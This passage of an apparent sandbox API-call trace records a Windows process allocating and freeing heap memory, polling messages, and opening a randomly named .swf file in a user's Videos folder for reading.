(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0106.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0106.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0106.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0106.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0106.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0106.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0106.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0106.696] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0106.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0106.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0106.699] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.699] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0106.699] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0106.699] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0106.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0106.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0106.699] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\u5ysbeddagyji-.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0106.700] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.700] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.700] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0106.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.700] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0106.701] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0106.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0106.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0106.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0106.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x43ed088 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed088 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, 